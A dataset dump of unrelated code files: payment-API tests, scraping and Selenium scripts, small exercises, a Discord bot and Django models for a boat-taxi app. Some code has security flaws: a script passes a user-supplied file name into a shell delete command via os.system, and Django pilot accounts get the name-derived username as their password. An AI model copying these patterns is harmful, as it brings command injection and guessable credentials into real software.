instance_of(PAYMENTRESPONSE))\n assert_that(response.RESPONSECODE, equal_to('A'))\n\n\ndef test_paysafe_keyed_payment_ok():\n request = payment_avs().is_multicurrency(True)\n request.AUTOREADY = 'C'\n\n response = wn.xml(TERM_ID).payment(request)\n assert_that(response, instance_of(PAYMENTRESPONSE))\n assert_that(response.RESPONSECODE, equal_to('A'))\n\n\ndef test_paysafe_partial_refund():\n p = payment_avs()\n p.AUTOREADY = 'C'\n payment_response = wn.xml(TERM_ID).payment(p)\n assert_that(payment_response, instance_of(PAYMENTRESPONSE))\n assert_that(payment_response.RESPONSECODE, equal_to('A'))\n\n uniqueref = payment_response.UNIQUEREF\n amount = round(p.AMOUNT / 2)\n refund_response = wn.xml(TERM_ID).refund(uniqueref, amount)\n assert_that(refund_response, instance_of(REFUNDRESPONSE))\n assert_that(refund_response.RESPONSECODE, equal_to('A'))\n\n\ndef test_paysafe_full_refund():\n p = payment_avs()\n p.AUTOREADY = 'C'\n payment_response = wn.xml(TERM_ID).payment(p)\n assert_that(payment_response, instance_of(PAYMENTRESPONSE))\n assert_that(payment_response.RESPONSECODE, equal_to('A'))\n\n uniqueref = payment_response.UNIQUEREF\n refund_response = wn.xml(TERM_ID).refund(uniqueref, p.AMOUNT)\n assert_that(refund_response, instance_of(REFUNDRESPONSE))\n assert_that(refund_response.RESPONSECODE, equal_to('A'))\n","sub_path":"test/xml/exigo/test_paysafe_payment.py","file_name":"test_paysafe_payment.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33373136","text":"from selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nfrom selenium import webdriver as driver\nfrom selenium.webdriver.common.by import By\n\nbrowser = driver.Chrome(\"C:\\\\Browsers_Selenium\\\\Chrome\\\\ChromeDriver.exe\")\nbrowser.maximize_window()\nbrowser.get(\"http://www.amazon.in\")\n\n#Function for Select dropdown value by visible text\ndef select_dropdown_by_visible_text(element, select_text):\n assert_element_is_dropdown(element)\n all_options = element.find_elements_by_tag_name('option')\n for option in all_options:\n #all_options_dropdown_value = Select(all_options)\n #option_text = all_options_dropdown_value.select_by_visible_text(select_text)\n option_text = option.text\n print(option_text)\n option_found = False\n if option_text == select_text:\n #driver.implicitly_wait(10000)\n option.click()\n option_found = True\n break\n\n if not option_found:\n raise ('The requested value was not found in the dropdown')\n return\n\n#Function for select dropdown value by value\ndef select_dropdown_by_value(element, select_value):\n assert_element_is_dropdown(element)\n all_options = element.find_elements_by_tag_name('value')\n for option in all_options:\n option_text = option.get_attribute('value')\n option_found = False\n if option_text == select_value:\n option.click()\n option_found = True\n break\n\n if not option_found:\n raise ('The requested value was not found in the dropdown')\n return\n\n#function for wether element is dropdown or not\ndef assert_element_is_dropdown(element):\n if element.get_attribute('type') not in ['select-one', 'select-multi']:\n raise AssertionError('This is not a dropdown')\n return\n\nmy_dropdown = browser.find_element_by_xpath(\"//*[@id='searchDropdownBox']\")\nprint(\"my_dropdown - \", my_dropdown)\n\n#select_dropdown_by_visible_text(my_dropdown,'Books')\nselect_dropdown_by_value(my_dropdown,'Baby')","sub_path":"Learning Script/dropdown.py","file_name":"dropdown.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384233815","text":"casa= int(input('Qual o valor da casa? '))\nsalario= int(input('Qual o seu salario? '))\nanos= int(input('Em quantos anos voce quer pagar? '))\ndef emprestimo(casa,salario,anos):\n x=casa/(anos*12)\n if x<=0.3*salario:\n return('Empréstimo aprovado')\n else:\n return('Empréstimo não aprovado')\nprint(emprestimo(casa,salario,anos))","sub_path":"backup/user_036/ch26_2020_03_18_01_24_48_123205.py","file_name":"ch26_2020_03_18_01_24_48_123205.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10582844","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 17 11:22:42 2017\n\n@author: rd0348\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\n\n# 用 Numpy 随机生成100个数据\nx_data = np.float32(np.random.rand(2,100))\ny_data = np.dot([0.100,0.200],x_data)+0.300\n\n# 构造一个线性模型\nb = tf.Variable(tf.zeros([1]))\nW = tf.Variable(tf.random_uniform([1,2],-1.0,1.0))\ny = tf.matmul(W,x_data)+b\n\n\n# 最小化方差\nloss = tf.reduce_mean(tf.square(y-y_data))\noptimizer = tf.train.GradientDescentOptimizer(0.5)\ntrain = optimizer.minimize(loss)\n\n# 初始化变量\ninit = tf.initialize_all_variables()\n\n# 启动图(graph)\nsess = tf.Session()\nsess.run(init)\n\n# 拟合平面\nfor step in range(0,201):\n sess.run(train)\n if step % 20 == 0:\n print(step,sess.run(W),sess.run(b))\n\nmatrix1 = tf.constant([[3.,3.]])\nmatrix2 = tf.constant([[2.],[2.]])\nproduct = tf.matmul(matrix1,matrix2)\nwith tf.Session() as sess:\n print(sess.run(product))\n\n","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558082739","text":"#!/usr/bin/env python\n\nimport os, sys\nfrom optparse import OptionParser\n\nthis_dir = os.path.dirname(os.path.realpath(__file__))\n\ndef get_license_by_name(name):\n if name.lower() == 'bsd':\n return open(os.path.join(this_dir, 'licenses', 'bsd.txt'), 'r').read()\n elif name.lower() == 'mit':\n return open(os.path.join(this_dir, 'licenses', 'mit.txt'), 'r').read()\n elif name.lower() == 'gpl':\n return open(os.path.join(this_dir, 'licenses', 'gpl_v3.txt'), 'r').read()\n else:\n return \"REPLACE ME WITH A LICENSE\"\n\ndef comment_license(license, prefix=\" * \"):\n commented_license = \"\"\n for line in license.split('\\n'):\n commented_license += (prefix+line+'\\n')\n return commented_license\n\ndef get_module_path(module):\n return os.path.join(this_dir, 'modules', module)\n\ndef get_module_hooks(subs, module):\n hooks_dir = os.path.join(get_module_path(module), 'hooks')\n for root, dirs, files in os.walk(hooks_dir):\n for file_name in files:\n sub = file_name.split('.')[0]\n if sub in subs:\n subs[sub] += open(os.path.join(root, file_name), 'r').read()\n else:\n subs[sub] = open(os.path.join(root, file_name), 'r').read()\n return subs\n\ndef walk_module_template(module, output_dir, subs):\n template_dir = os.path.join(get_module_path(module), 'template')\n for root, dirs, files in os.walk(template_dir):\n rel_path = os.path.relpath(root, template_dir)\n if not os.path.exists(os.path.join(output_dir, rel_path.format(**subs))):\n os.makedirs(os.path.join(output_dir, rel_path.format(**subs)))\n for file_name in files:\n # Read the file contents\n file_contents = open(os.path.join(root, file_name), 'r').read()\n try:\n # Substitute the file name\n file_name_sub = file_name.format(**subs)\n subs['this_file'] = file_name_sub\n # Substitute the contents\n file_contents = file_contents.format(**subs)\n except KeyError as e:\n print(\"Missing key `{}` in file `{}`\".format(str(e), os.path.join(root, file_name)))\n return\n # Write the new contents to the desitnation\n open(os.path.join(output_dir, rel_path.format(**subs), file_name_sub), 'w+').write(file_contents)\n\ndef create_project(options, modules):\n # Create subs\n subs = {}\n subs['project_name'] = options.project_name.lower()\n project_name = options.project_name.lower()\n output_dir = os.path.join(options.output_dir, project_name)\n subs['project_name_camel'] = options.project_name\n subs['project_name_caps'] = project_name.upper()\n subs['author'] = options.author\n subs['email'] = options.email\n from datetime import date\n subs['year'] = str(date.today().year)\n subs['license_type'] = options.license\n subs['license'] = get_license_by_name(options.license)\n subs['license_commented'] = comment_license(subs['license'])\n subs['organization'] = options.organization\n subs['cmake_include_hook'] = ''\n subs['header_hook_1'] = ''\n subs['header_hook_2'] = ''\n subs['header_hook_3'] = ''\n subs['header_public_hook'] = ''\n subs['header_private_hook'] = ''\n subs['cmake_post_library_hook'] = ''\n\n for module in modules:\n subs = get_module_hooks(subs, module)\n\n # Recursively replace\n for key in subs.keys():\n try:\n subs[key] = subs[key].format(**subs)\n except KeyError as e:\n print('Unhandled key: {}'.format(str(e)))\n\n # If the directory does not exist, make it\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n # Walk the template base\n for root, dirs, files in os.walk(os.path.join(this_dir, 'base')):\n rel_path = os.path.relpath(root, os.path.join(this_dir, 'base'))\n if not os.path.exists(os.path.join(output_dir, rel_path.format(**subs))):\n os.makedirs(os.path.join(output_dir, rel_path.format(**subs)))\n for file_name in files:\n # Read the file contents\n file_contents = open(os.path.join(root, file_name), 'r').read()\n try:\n # Substitute the file name\n file_name_sub = file_name.format(**subs)\n subs['this_file'] = file_name_sub\n # Substitute the contents\n file_contents = file_contents.format(**subs)\n except KeyError as e:\n print(\"Missing key `{}` in file `{}`\".format(str(e), os.path.join(root, file_name)))\n return\n # Write the new contents to the desitnation\n open(os.path.join(output_dir, rel_path.format(**subs), file_name_sub), 'w+').write(file_contents)\n\n # Integrate module templates\n for module in modules:\n walk_module_template(module, output_dir, subs)\n\ndef main():\n parser = OptionParser()\n parser.add_option(\"-o\", \"--output-dir\", dest=\"output_dir\",\n help=\"Folder to write new project to\", metavar=\"OUTPUT_DIR\")\n parser.add_option(\"-p\", \"--project-name\", dest=\"project_name\",\n help=\"Name of the project, use camel case (e.g. SuperSensor4001 rather than supersensor4001 or SUPERSENSOR4001)\",\n metavar=\"PROJECT_NAME\")\n parser.add_option(\"-a\", \"--author\", dest=\"author\",\n help=\"Author's name\", metavar=\"AUTHOR\")\n parser.add_option(\"-e\", \"--email\", dest=\"email\",\n help=\"Author's email\", metavar=\"EMAIL\")\n parser.add_option(\"-l\", \"--license\", dest=\"license\", default=\"None\",\n help=\"License of the project: BSD, MIT, GPL, NONE [default: %default]\")\n parser.add_option(\"-g\", \"--organization\", dest=\"organization\",\n help=\"Organization\", metavar=\"ORGANIZATION\")\n (options, args) = parser.parse_args()\n if not options.output_dir:\n print(\"Ouput Directory required\")\n parser.print_help()\n return\n if not options.project_name:\n print(\"Project Name required\")\n parser.print_help()\n return\n if not options.author:\n print(\"Author Name required\")\n parser.print_help()\n return\n if not options.email:\n print(\"Author Email required\")\n parser.print_help()\n return\n if options.license.lower() not in ['bsd', 'mit', 'gpl', 'none']:\n print(\"Invalid license, must be on of BSD, MIT, GPL, NONE\")\n parser.print_help()\n return\n if not options.organization:\n print(\"Organization required\")\n parser.print_help()\n return\n create_project(options, modules=[])\n\nif __name__ == '__main__':\n main()\n","sub_path":"generate_project.py","file_name":"generate_project.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563301028","text":"import sys\nimport time\nimport os\n\ndef read(fn):\n\twith open(fn) as f:\n\t\tdata = f.readlines()\n\treturn data\ndef write(fn, data):\n\tf = open(fn, \"w\")\n\tfor line in data:\n\t\tf.write(line)\n\tf.close()\n\treturn\ndef consoleOut(fn):\n\tcommand = \"IF EXIST \"+fn+\" ( rm \"+fn+\" )\"\n\tres = os.system(command)\n\tif(res != 0): print(\"PROCESS RETURNED \"+res)\n\treturn\ndef main():\n\tstart = time.time()\n\tfn = sys.argv[1]\n\tdestination = sys.argv[2]\n\ttestCount = int(sys.argv[3])\n\tdestroyAfter = int(sys.argv[4])\n\tprint(\"new file name: \", destination, end=\"\\n\")\n\tprint(\"Starting test, reading file \", fn, \" \", testCount, \" times\\n-----------------------\", end=\"\\n\")\n\tfor i in range(testCount):\n\t\tdata = read(fn)\n\t\twrite(destination, data)\n\t\tif(destroyAfter):\n\t\t\tconsoleOut(destination)\n\tend = time.time()\n\tprint(\"Time elapsed: \", (end-start))\n\treturn\n\nmain()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"248579003","text":"# pylint:disable=wildcard-import\r\n# pylint:disable=unused-import\r\n# pylint:disable=unused-variable\r\n# pylint:disable=unused-argument\r\n# pylint:disable=redefined-outer-name\r\n\r\nfrom pathlib import Path\r\nfrom typing import Dict\r\n\r\nimport pytest\r\nfrom jsonschema import SchemaError, ValidationError\r\n\r\nfrom servicelib.jsonschema_specs import create_jsonschema_specs\r\nfrom servicelib.jsonschema_validation import validate_instance\r\nfrom simcore_service_webserver.projects.projects_fakes import Fake\r\n\r\n\r\n@pytest.fixture\r\ndef project_schema_file(api_specs_dir: Path) -> Path:\r\n return api_specs_dir / \"v0/components/schemas/project-v0.0.1.json\"\r\n\r\n@pytest.fixture\r\nasync def project_specs(loop, project_schema_file: Path) -> Dict:\r\n # should not raise any exception\r\n try:\r\n specs = await create_jsonschema_specs(project_schema_file)\r\n return specs\r\n except SchemaError:\r\n pytest.fail(\"validation of schema {} failed\".format(project_schema_file))\r\n\r\n\r\n@pytest.fixture\r\ndef fake_db():\r\n Fake.reset()\r\n Fake.load_template_projects()\r\n\r\nasync def test_validate_templates(loop, project_specs: Dict, fake_db):\r\n for pid, project in Fake.projects.items():\r\n try:\r\n validate_instance(project.data, project_specs)\r\n except ValidationError:\r\n pytest.fail(\"validation of project {} failed\".format(pid))\r\n\r\n","sub_path":"services/web/server/tests/unit/test_template_projects.py","file_name":"test_template_projects.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634880858","text":"import unittest\nfrom abelfunctions.tests.test_abelfunctions import AbelfunctionsTestCase\n\nfrom abelfunctions import RiemannSurface\n\nclass TestConstruction(AbelfunctionsTestCase):\n\n def test_places(self):\n X = RiemannSurface(self.f1)\n places = X(-3)\n for bi in X.branch_points:\n places = X(bi)\n\n X = RiemannSurface(self.f2)\n places = X(-3)\n for bi in X.branch_points:\n places = X(bi)\n","sub_path":"abelfunctions/tests/test_riemann_surface.py","file_name":"test_riemann_surface.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540225266","text":"import os\nimport logging\nimport logging.handlers\n\n\ndef getLogger(name):\n logger = logging.Logger(name)\n\n handler = logging.handlers.RotatingFileHandler(\n os.path.join('/app/rapse/log/', name + '.log'),\n mode='a',\n maxBytes=5 * 1024 * 1024,\n backupCount=10,\n )\n\n handler.setLevel(logging.INFO)\n handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n logger.addHandler(handler)\n return logger\n\n\ndef split_list(list, size):\n for i in range(0, len(list), size):\n yield list[i:i + size]\n","sub_path":"app/util/generals.py","file_name":"generals.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"103668624","text":"import json\nimport requests \nimport random\nimport discord\n\nclient = discord.Client()\n\nchallenges = []\nwith open('Functionalities\\challenges.json') as json_file:\n data = json.load(json_file)\n for c in data['challenges']:\n challenges.append(c)\n temp = data['challenges']\n\n#adds new challenge to the challenge list\ndef write_json(data, filename='Functionalities\\challenges.json'):\n with open(filename,'w') as f:\n json.dump(data,f,indent=4)\n\n#this function gets you a challenge from the list of challenges and returns it as a string to be sent through chat.\ndef get_challenge():\n response = requests.get(f\"https://www.codewars.com/api/v1/code-challenges/{random.choice(challenges)}\")\n json_data = json.loads(response.text)\n challenge = json_data['name']+ '\\n' + 'Languages: ' +str(json_data['languages']) + '\\n' + json_data['url']\n return challenge\n\n#this function adds a new challenge to the challenges list\ndef new_challenge(challenge_url):\n challenge_id = challenge_url.split('/')[-3]\n if challenge_id not in challenges:\n temp.append(challenge_id)\n write_json(data)\n return f'Se añadio https://www.codewars.com/kata/{challenge_id} a la lista!'\n else:\n return 'El reto ya existe en nuestra base de datos!' \n\n#this function return our current challenge list\n x = []\n for i in range(len(challenges)):\n response = requests.get(f\"https://www.codewars.com/api/v1/code-challenges/{challenges[i]}\")\n json_data = json.loads(response.text)\n challenge = json_data['url']\n x.append(challenge)\n return x","sub_path":"Functionalities/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415233695","text":"# Author: Kene Udeh\n# Title: The Easiest Problem Is This One\n# Question: https://open.kattis.com/problems/easiest\n# Run: python easiest.py < \"input files/easiest.in\"\nimport sys\nfrom functools import reduce\n\ndef easiest():\n\n str_num = sys.stdin.readline()[:-1]\n num = int(str_num)\n\n while num != 0:\n\n digit_sum = reduce((lambda x, y: x + y), list(map(lambda x: int(x), list(str_num))))\n new_num = 11\n same_sum = reduce((lambda x, y: x + y), list(map(lambda x: int(x), list(str(num * new_num)))))\n\n while True:\n if same_sum == digit_sum:\n break\n new_num += 1\n mult = num * new_num\n same_sum = reduce(lambda x, y: x + y, list(map(lambda x: int(x), list(str(mult)))))\n\n\n print(new_num)\n str_num = sys.stdin.readline()[:-1]\n num = int(str_num)\n\nif __name__ == '__main__':\n easiest()\n","sub_path":"kattis-problems/easiest.py","file_name":"easiest.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375523405","text":"\"\"\"\nУзнайте у пользователя число n. Найдите сумму чисел n + nn + nnn. Например, пользователь ввёл число 3.\nСчитаем 3 + 33 + 333 = 369.\n\"\"\"\nnumber = input('Input an integer number: ')\n\nwhile True:\n if number.isdigit():\n number_1 = int(number)\n break\n else:\n print(\"Input only integer numbers\")\n number = input('Input a number: ')\n\nnumber_2, number_3 = number * 2, number * 3\n\nprint(f\"{number_1} + {number_2} + {number_3} = {int(number_1) + int(number_2) + int(number_3)}\")\n\n","sub_path":"lesson_1/task_1_3.py","file_name":"task_1_3.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"413431696","text":"# coding=utf-8\nimport json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport os\n\nfrom bs4 import BeautifulSoup\nimport urllib, urllib.request, urllib.error\nfrom retry import retry\nimport time\n\nKOREAN_DRAMAS_TOP = \"https://filmarks.com/list-drama/country/147\"\nDRAMA_DETAIL = \"https://filmarks.com/dramas/{}/{}\"\n\ndriver = webdriver.Remote(\n command_executor='http://selenium-hub:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.CHROME)\n\n@retry(ValueError,tries=10, delay=10)\ndef get_reviews(drama_series_id, drama_season_id, page=1):\n time.sleep(2)\n print(\"Get Reviews: page=\", page)\n\n driver.get(DRAMA_DETAIL.format(drama_series_id, drama_season_id) + \"?page={}\".format(page))\n time.sleep(2.0)\n soup = BeautifulSoup(driver.page_source.encode('utf-8'), features=\"html.parser\")\n reviews_container = soup.find(class_=\"p-main-area\")\n review_elems = reviews_container.find_all(class_=\"p-mark__review\")\n reviews = [review_elem.get_text() for review_elem in review_elems]\n\n next_elem = reviews_container.find(class_=\"c-pagination__next\")\n\n if next_elem and \"is-hidden\" not in next_elem.get(\"class\"):\n reviews.extend(get_reviews(drama_series_id, drama_season_id, page + 1)) # 次のページの内容を追加\n\n return reviews\n\n\ndef get_detail(drama_series_id, drama_season_id):\n print(\"Get Detail:\", drama_series_id, drama_season_id)\n\n driver.get(DRAMA_DETAIL.format(drama_series_id, drama_season_id))\n time.sleep(1.0)\n soup = BeautifulSoup(driver.page_source.encode('utf-8'), features=\"html.parser\")\n detail_body = soup.find(class_=\"p-content-detail__body\")\n\n # print(driver.find_element_by_class_name())\n # Title\n title = detail_body.find(class_=\"p-content-detail__title\").find(\"span\", recursive=False).get_text()\n print(\"Title=\", title)\n\n # Detail\n detail = None\n details = detail_body.find_all(class_=\"p-content-detail__synopsis-desc\")\n\n if details and len(details):\n detail = details[-1].get_text() # [0]は,「続きを読む」クリック前の短いもの\n print(\"Detail=\", detail)\n\n # Thumbnail\n thumbnail = detail_body.find(class_=\"c-content__jacket\").find(\"img\").get(\"src\")\n print(\"Thumbnail=\", thumbnail)\n\n # Stars\n stars = detail_body.find(class_=\"c-rating__score\").get_text()\n print(\"Starts=\", stars)\n\n # Year\n title_elem = detail_body.find(class_=\"p-content-detail__title\")\n if title_elem and title_elem.find(\"a\"):\n year = title_elem.find(\"a\").get_text()\n print(\"Year=\", year)\n\n # Casts\n casts = None\n cast_elem = detail_body.find(class_=\"p-content-detail__people-list-casts\")\n if cast_elem:\n cast_elements = cast_elem.find_all(\"a\")\n casts = [cast_element.get_text() for cast_element in cast_elements]\n print(\"Casts=\", casts)\n\n # Movies\n vod = detail_body.find(class_=\"p-content-detail-related-info-content__vod\")\n\n amazon_prime = \"\"\n netflix = \"\"\n if vod:\n movie_elements = detail_body.find(class_=\"p-content-detail-related-info-content__vod\").find_all(\"a\")\n movies = [movie_element.get(\"href\") for movie_element in movie_elements]\n for movie in movies:\n if \"amazon\" in movie: # Amazon Prime\n amazon_prime = movie\n\n elif \"netflix\" in movie: # Netflix\n netflix = movie\n\n print(\"Amazon Prime=\", amazon_prime)\n print(\"Netflix=\", netflix)\n\n # Reviews\n reviews = get_reviews(drama_series_id, drama_season_id)\n\n return {\n \"title\": title,\n \"detail\": detail,\n \"thumbnail\": thumbnail,\n \"stars\": stars,\n \"year\": year,\n \"casts\": casts,\n \"amazon_prime\": amazon_prime,\n \"netflix\": netflix,\n \"reviews\": reviews\n }\n\n\ndef get_page(url, page_number=0):\n old_url = url\n if page_number:\n url += \"?page={}\".format(page_number)\n\n\n\n print(\"Get Page:\", url)\n html = urllib.request.urlopen(url)\n soup = BeautifulSoup(html, features=\"html.parser\")\n\n dramas = soup.find(class_=\"p-movies-grid\").find_all(recursive=False)\n\n is_first = True\n for i, drama in enumerate(dramas):\n if is_first: # 最初の要素は違うやつなので無視\n is_first = False\n continue\n\n filename = \"{}.json\".format(i)\n if page_number:\n filename = str(page_number) + \"_\" + filename\n\n if os.path.exists(\"./results/{}\".format(filename)):\n continue\n\n drama_data = json.loads(drama.attrs[\"data-drama-season-clip\"])\n drama_series_id = drama_data[\"drama_series_id\"]\n drama_season_id = drama_data[\"drama_season_id\"]\n\n drama_data = get_detail(drama_series_id, drama_season_id)\n\n with open(\"./results/{}\".format(filename), mode=\"a\") as f:\n f.write(json.dumps(drama_data, ensure_ascii=False))\n\n if not page_number:\n page_number+=1\n get_page(old_url, page_number + 1)\n\n# 韓国のドラマ一覧\nget_page(KOREAN_DRAMAS_TOP)\n\ndriver.close()\ndriver.quit()\n","sub_path":"script/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"271803509","text":"# -*- coding: utf-8 -*-\n# import datetime\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import Max\nfrom django.core.validators import MinValueValidator\nimport datetime\nimport random\nfrom django.utils.text import slugify\n\n\nBARCO_CORES = (\n (\"#000\", \"Black\"),\n (\"#ec8800\", \"Orange\"),\n (\"#000080\", \"Navy\"),\n (\"#800080\", \"Purple\"),\n (\"#FF0000\", \"Red\"),\n (\"#2E8B57\", \"SeaGreen\"),\n (\"#00FF7F\", \"SpringGreen\"),\n (\"#FF6347\", \"Tomato\"),\n (\"#FFFF00\", \"Yellow\"),\n (\"#0000FF\", \"Blue\"),\n (\"#5F9EA0\", \"CadetBlue\"),\n)\n\n\nVIAGEM_STATUS = (\n (0, \"Inativa\"),\n (1, \"Passageiro desistiu\"),\n (3, \"Aguardando aceite\"),\n (4, \"Aguardando embarque\"),\n (5, \"Passageiro embarcado\"),\n (6, \"Viagem finalizada\"),\n)\n\ndef upload_banner(instance, filename):\n pk = instance.pk\n if not pk:\n id = Anuncio.objects.all().aggregate(Max('id'))\n pk = id['id__max'] + 1\n return u\"anuncio/banner/{0}/{1}\".format(pk, filename)\n\n\nclass Passageiro(models.Model):\n nome = models.CharField(max_length=255)\n senha = models.CharField(max_length=255, null=True, blank=True)\n email = models.CharField(max_length=500, null=True, blank=True)\n telefone = models.CharField(max_length=255, null=True, blank=True)\n ultimo_login = models.DateTimeField(null=True, blank=True)\n data_nascimento = models.DateField(null=True, blank=True)\n\n def viagens_realizadas(self):\n\n return self.viagem_set.filter(data_desembarque__isnull=False).count()\n\n def __unicode__(self):\n return self.nome\n\n def to_json(self):\n p = {}\n p[\"pk\"] = self.pk\n p[\"nome\"] = self.nome\n p[\"email\"] = self.email\n p[\"telefone\"] = self.telefone\n if self.data_nascimento:\n p[\"data_nascimento\"] = self.data_nascimento.isoformat()\n else:\n p[\"data_nascimento\"] = None\n\n return p\n\n\nclass Piloto(models.Model):\n nome = models.CharField(max_length=255)\n ativo = models.BooleanField(default=False)\n user = models.ForeignKey(User, verbose_name=u\"Usuário\", null=True, blank=True, on_delete=models.SET_NULL)\n\n def save(self, *args, **kwargs):\n\n if not self.user:\n user = User()\n user.username = slugify(self.nome)\n user.set_password(user.username)\n user.save()\n self.user = user\n else:\n self.user.is_active = self.ativo\n if self.user.username != slugify(self.nome):\n self.user.username = slugify(self.nome)\n self.user.save()\n\n super(Piloto, self).save(*args, **kwargs)\n\n\n def to_json(self):\n\n return {\n \"nome\": self.nome,\n \"pk\": self.pk,\n }\n\n def __unicode__(self):\n return self.nome\n\n\nclass Barco(models.Model):\n nome = models.CharField(max_length=255)\n ativo = models.BooleanField(default=False)\n numero_passageiros = models.PositiveIntegerField(default=12, validators=[MinValueValidator(1)],\n choices=[(n, n) for n in xrange(1, 30)])\n ultima_localizacao = models.CharField(max_length=255, null=True, blank=True, default=\"-23.002195, -43.310382\")\n cor = models.CharField(max_length=255, null=True, blank=True, choices=BARCO_CORES, default=\"#000\")\n\n ultimo_piloto = models.ForeignKey(Piloto, null=True, blank=True)\n\n def to_json(self):\n\n b = {\n \"nome\": self.nome,\n \"pk\": self.pk,\n \"lat\": None,\n \"lng\": None,\n \"cor\": self.cor,\n }\n\n if self.ultima_localizacao:\n b[\"lat\"] = float(self.ultima_localizacao.split(\", \")[0])\n b[\"lng\"] = float(self.ultima_localizacao.split(\", \")[1])\n\n return b\n\n def __unicode__(self):\n return self.nome\n\n\nclass Preco(models.Model):\n preco = models.DecimalField(verbose_name=u'Preço', max_digits=10, decimal_places=2)\n resumo_initinerario = models.TextField()\n ativo = models.BooleanField(default=True)\n\n class Meta:\n verbose_name = u'Preço'\n verbose_name_plural = u'Preços'\n ordering = ['preco']\n\n def __unicode__(self):\n return u\"R${0}\".format(str(self.preco).replace(\".\", \",\"))\n\n\nclass Anuncio(models.Model):\n descricao = models.CharField(max_length=255, help_text=u\"Nome do anunciante ( não será exibido no aplicativo )\",\n null=True, blank=False)\n banner = models.ImageField(upload_to=upload_banner, help_text=u\"Tamanho: 300 x 100\")\n link = models.URLField(null=True, blank=True, default=None)\n ativo = models.BooleanField(default=True)\n\n def to_json(self):\n if self.link == \"\":\n lk = None\n else:\n lk = self.link\n return {\n \"banner\": self.banner.url,\n \"link\": lk,\n }\n\n def __unicode__(self):\n return self.descricao\n\n class Meta:\n verbose_name = u\"Anúncio\"\n verbose_name_plural = u\"Anúncios\"\n\n\nclass PontosEmbarque(models.Model):\n nome = models.CharField(max_length=255)\n localizacao = models.CharField(max_length=200, verbose_name=u\"Localização\")\n ativo = models.BooleanField(default=True)\n\n def to_json(self):\n\n return {\"lat\": float(self.localizacao.split(\", \")[0]),\n \"lng\": float(self.localizacao.split(\", \")[1]),\n \"nome\": self.nome,\n \"pk\": self.pk\n }\n\n\n class Meta:\n verbose_name = \"Pontos de embarque/desembarque\"\n verbose_name = \"Pontos de embarque/desembarque\"\n\n def __unicode__(self):\n return self.nome\n\n\nclass Viagem(models.Model):\n\n data_chamada = models.DateTimeField(db_index=True)\n passageiro = models.ForeignKey(Passageiro)\n quantidade = models.PositiveIntegerField(default=1, validators=[MinValueValidator(1)],\n choices=[(n, n) for n in xrange(1, 30)])\n ponto_desembarque = models.ForeignKey(PontosEmbarque, null=True, blank=False, related_name='ponto_desembarque')\n ponto_embarque = models.ForeignKey(PontosEmbarque, null=True, blank=False, related_name='ponto_embarque')\n\n aceite_piloto = models.DateTimeField(db_index=True, null=True, blank=True)\n piloto = models.ForeignKey(Piloto, null=True, blank=True)\n barco = models.ForeignKey(Barco, null=True, blank=True)\n\n embarque = models.CharField(max_length=255)\n embarque_lat_long = models.CharField(max_length=255)\n\n data_embarque = models.DateTimeField(db_index=True, null=True, blank=True)\n\n desembarque = models.CharField(max_length=255)\n desembarque_lat_long = models.CharField(max_length=255)\n data_desembarque = models.DateTimeField(db_index=True, null=True, blank=True)\n\n preco = models.DecimalField(default=0, max_digits=10, decimal_places=2, null=True, blank=True)\n preco_model = models.ForeignKey(Preco, null=True, blank=True)\n cor = models.CharField(max_length=100, null=True, blank=True)\n nota_classificacao = models.IntegerField(default=-1)\n\n status = models.IntegerField(choices=VIAGEM_STATUS, default=3)\n\n def save(self, *args, **kwargs):\n\n if self.ponto_embarque:\n self.embarque = self.ponto_embarque.nome\n self.embarque_lat_long = self.ponto_embarque.localizacao\n\n if self.ponto_desembarque:\n self.desembarque = self.ponto_desembarque.nome\n self.desembarque_lat_long = self.ponto_desembarque.localizacao\n\n if not self.cor:\n self.cor = settings.CORES_CHAMADAS[random.randint(0, len(settings.CORES_CHAMADAS)-1)]\n\n if self.preco_model:\n self.preco = self.preco_model.preco\n\n if not self.status == 0:\n if self.desistenciapassageiro_set.count() > 0:\n self.status = 1\n elif self.data_desembarque:\n self.status = 6\n elif self.data_embarque:\n self.status = 5\n elif self.aceite_piloto:\n self.status = 4\n elif 